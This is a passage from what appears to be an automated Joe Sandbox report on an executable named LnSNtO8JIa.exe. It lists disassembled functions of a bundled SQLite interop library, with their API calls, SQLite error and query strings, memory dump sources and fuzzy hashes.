                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: [$d$null
                                                                                      • API String ID: 223094752-4114074285
                                                                                      • Opcode ID: 052dc7934ae2f0da0a17f7ba034637d608cc9d005f772deeb7b587e67cf697d3
                                                                                      • Instruction ID: 65fb4a54e4ce372618a2b5c1fa8ec2df198a28bd1596fbf7a8f9c498a046c739
                                                                                      • Opcode Fuzzy Hash: 052dc7934ae2f0da0a17f7ba034637d608cc9d005f772deeb7b587e67cf697d3
                                                                                      • Instruction Fuzzy Hash: 3951AF706083208BD301EE19D48079EBBE1BB8D31CF15491EE8A997781D735E949CF93
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C404BB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: NEAR$fts5: %s queries are not supported (detail!=full)$phrase
                                                                                      • API String ID: 0-911639285
                                                                                      • Opcode ID: 6bcaa5efe9b63d14561f5ffb3684c375b9d3925cb0a26952cdad021d20eec45c
                                                                                      • Instruction ID: f3a353e0a1ffcd82b1cb83c9d45986801ee159f54149afd1294666476a3129ff
                                                                                      • Opcode Fuzzy Hash: 6bcaa5efe9b63d14561f5ffb3684c375b9d3925cb0a26952cdad021d20eec45c
                                                                                      • Instruction Fuzzy Hash: A751B0327882148FC718DF15D480E6AB3A5FFA539AF15927DD8268BB40D731E945CBC1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C444BC0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029A97,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C444BF0
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C444BE9
                                                                                      • misuse, xrefs: 6C444BE4
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C444BDA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 2ef88d7be0d08687ee49e76bf33b8f1caf095e9fdaa79fb4b26c74d60f336f41
                                                                                      • Instruction ID: 1eb5af0626ace7c15b783f1a8d0a020d6c75671b1a310bfc5e8c470e8955c7e1
                                                                                      • Opcode Fuzzy Hash: 2ef88d7be0d08687ee49e76bf33b8f1caf095e9fdaa79fb4b26c74d60f336f41
                                                                                      • Instruction Fuzzy Hash: 0541D0B57002059FFB04CF29E480E5AB7A6FF8939DF2A902DE9155BB41DB31E801CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C46BCF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(6C4F8C10,?), ref: 6C46BD5D
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?), ref: 6C46BDA6
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(sqlite3_get_table() called with two or more incompatible queries), ref: 6C46BDB3
                                                                                      Strings
                                                                                      • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C46BDAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.$Ifc350ae509dc2b53.
                                                                                      • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                      • API String ID: 3070092795-4279182443
                                                                                      • Opcode ID: 2204bfd065caf25011a75fb96831b87ac417de4f0ea6e7328d799e44f948298d
                                                                                      • Instruction ID: 27c212f3d6215f1f8ad0b923ae54935c701db9ae37b279a6f68ea3af055e0d4d
                                                                                      • Opcode Fuzzy Hash: 2204bfd065caf25011a75fb96831b87ac417de4f0ea6e7328d799e44f948298d
                                                                                      • Instruction Fuzzy Hash: 0641D3316006019FD720CF56D880E66B3F5EB4431AF14467DF9A58BF45EB31E419DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4AC070 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000175E1,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4AC09C
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4AC095
                                                                                      • misuse, xrefs: 6C4AC090
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4AC086
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 810bd235044c4df394ff8fb19137deaf01abfce474b623a7373731d36a98252b
                                                                                      • Instruction ID: 46527f13def312fc6b9c10a95adb542c6e5080eaf1a4de892d4ef91ac30a3b97
                                                                                      • Opcode Fuzzy Hash: 810bd235044c4df394ff8fb19137deaf01abfce474b623a7373731d36a98252b
                                                                                      • Instruction Fuzzy Hash: B4410371B04215ABDB04EF99C880E5AB7B1BF44729F04862DEC2887B45D732E855CFE2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4CC8D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0000F912,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,?,?,?,6C4D2E58,00000000), ref: 6C4CC9FD
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4CC9F6
                                                                                      • database corruption, xrefs: 6C4CC9F1
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4CC9E7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 6874c21225765d614c63f608e38b1aaefef96d92f061d5eab68a550eeebdff41
                                                                                      • Instruction ID: 469a90133f0c39ba8279bb114bd1060a36f6b1c8a9c1fd032f6e6db5665df5e3
                                                                                      • Opcode Fuzzy Hash: 6874c21225765d614c63f608e38b1aaefef96d92f061d5eab68a550eeebdff41
                                                                                      • Instruction Fuzzy Hash: 3D41D375F0121A9BDB14DF99D480EAEB7B1FB84349F2041AED809A7751D732D902CBC1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4BC620 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000135B7,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,00000000,00000000,00000000,?,6C45A0B4,?,?,?,?,?,?), ref: 6C4BC763
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 4b1b276abe29b15ce1688d2f49d0cdefc198fe0b73eb17208259ed6b8e512fde
                                                                                      • Instruction ID: 69442eea3cbbbc609c414504d650ab136786232284bdf8b90d484b6dba9213b6
                                                                                      • Opcode Fuzzy Hash: 4b1b276abe29b15ce1688d2f49d0cdefc198fe0b73eb17208259ed6b8e512fde
                                                                                      • Instruction Fuzzy Hash: 2A418371F0021A9FCB00DFADC8C0DEEB7B2AB89315F1445AAE858FB741D7705A459BA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C422570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(no such database: %s,?), ref: 6C4225C6
                                                                                      • SIfdb97bb7d9d0d622.SQLITE.INTEROP(?,CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN),?,00000003), ref: 6C4225F1
                                                                                      Strings
                                                                                      • CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 6C4225EB
                                                                                      • no such database: %s, xrefs: 6C4225C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifdb97bb7d9d0d622.
                                                                                      • String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
                                                                                      • API String ID: 3260204670-1404816483
                                                                                      • Opcode ID: 0fb51418e3ae4edc3ed3f213890e0d6d3a43ed5ec79a638532890e1bfaec86b5
                                                                                      • Instruction ID: e4ac585b9813ca5817be100be99563b8c894efabd27f50f7b81c75136882a023
                                                                                      • Opcode Fuzzy Hash: 0fb51418e3ae4edc3ed3f213890e0d6d3a43ed5ec79a638532890e1bfaec86b5
                                                                                      • Instruction Fuzzy Hash: A6310536B003018BC710CF29D849E5AB7A4EB85339F054A6DFC18D7B01DB35E95987E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3D6FBE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LnSNtO8JIa.exe,00000104), ref: 6C3D6FFE
                                                                                      • _free.LIBCMT ref: 6C3D70C9
                                                                                      • _free.LIBCMT ref: 6C3D70D3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$FileModuleName
                                                                                      • String ID: C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                      • API String ID: 2506810119-3948404115
                                                                                      • Opcode ID: 720e42031aac7c1a3d8236a19697b0ec06a91a4c795089d370e7f530107243ce
                                                                                      • Instruction ID: d595d6de6b2f22728143ac86d88de791033046f31f731f3578b1159961a47069
                                                                                      • Opcode Fuzzy Hash: 720e42031aac7c1a3d8236a19697b0ec06a91a4c795089d370e7f530107243ce
                                                                                      • Instruction Fuzzy Hash: FC31A672A44254AFDB11CF99CC85DDEBBFCEB86318F1240A6E80497B44D771AA44CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43EC60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028F69,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C43EC93
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C43EC8C
                                                                                      • misuse, xrefs: 6C43EC87
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C43EC7D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 70dbdb13ce1ec50c9444d82c1478e8d6a172f5f8bc6b04b2bad59c89acc2f7a4
                                                                                      • Instruction ID: ffba2b352a0b3262ed8d6c8e55d80a00d4df23275650ab5a3091cd9abf5f7667
                                                                                      • Opcode Fuzzy Hash: 70dbdb13ce1ec50c9444d82c1478e8d6a172f5f8bc6b04b2bad59c89acc2f7a4
                                                                                      • Instruction Fuzzy Hash: 43319F74B057029BD704DF2AC881D5AB7E5BFC8219F14892DE869C3B41E731E8088FD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F84F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3F85F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Ifc350ae509dc2b53.
                                                                                      • String ID: ASC$DESC$SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %s
                                                                                      • API String ID: 223094752-2517299288
                                                                                      • Opcode ID: 46c956acad098e3ce7441af86e0a9f00552e6dbb33f0f1960daed663b952114c
                                                                                      • Instruction ID: bc44e0749cd641f0dbf1eb6797acc58ff727f18332d2ea750383c6727061418b
                                                                                      • Opcode Fuzzy Hash: 46c956acad098e3ce7441af86e0a9f00552e6dbb33f0f1960daed663b952114c
                                                                                      • Instruction Fuzzy Hash: 5D3172717043059FE704CE0AD8C1F6AB7E8AB89318F00493EE958C7B11D775E9158BA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C464480 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002356E,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4644AB
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4644A4
                                                                                      • misuse, xrefs: 6C46449F
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C464495
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 96f3a190d18bd3b1ed886776ebdabc99966cd55cb3410703b995e1e26f2e81cc
                                                                                      • Instruction ID: b812f670bdc4dfd0cc7251a07c0bd148c96099360b7b478a20fd37d5abe0f80b
                                                                                      • Opcode Fuzzy Hash: 96f3a190d18bd3b1ed886776ebdabc99966cd55cb3410703b995e1e26f2e81cc
                                                                                      • Instruction Fuzzy Hash: 05313A317042449BDF00DF2BACA1F667BA59F457ADF1850A9DD09CBF4AE732E804C690
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4CADE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00010520,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,6C4B7640,?,?,00000000,?), ref: 6C4CAEA2
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4CAE9B
                                                                                      • database corruption, xrefs: 6C4CAE96
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4CAE51, 6C4CAE8C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 6620c32e305dfb464047b46d87143fbcc69d0efbc991c8384ae5f1f04232fc5b
                                                                                      • Instruction ID: 67d7d69655ab50d6d72734a2f08835578b5e48a0a4a5836052067ee131708068
                                                                                      • Opcode Fuzzy Hash: 6620c32e305dfb464047b46d87143fbcc69d0efbc991c8384ae5f1f04232fc5b
                                                                                      • Instruction Fuzzy Hash: B82175367402159BD704CE6CCC80EAAB3A6EF95314B1546AAE80CDB701E771AC42C6D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C448910 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00028EBF,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C448943
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C44893C
                                                                                      • misuse, xrefs: 6C448937
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C44892D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 73337400274256fc3b2ed8d05f0019b396b0b61fdf732599b72ba164185b4382
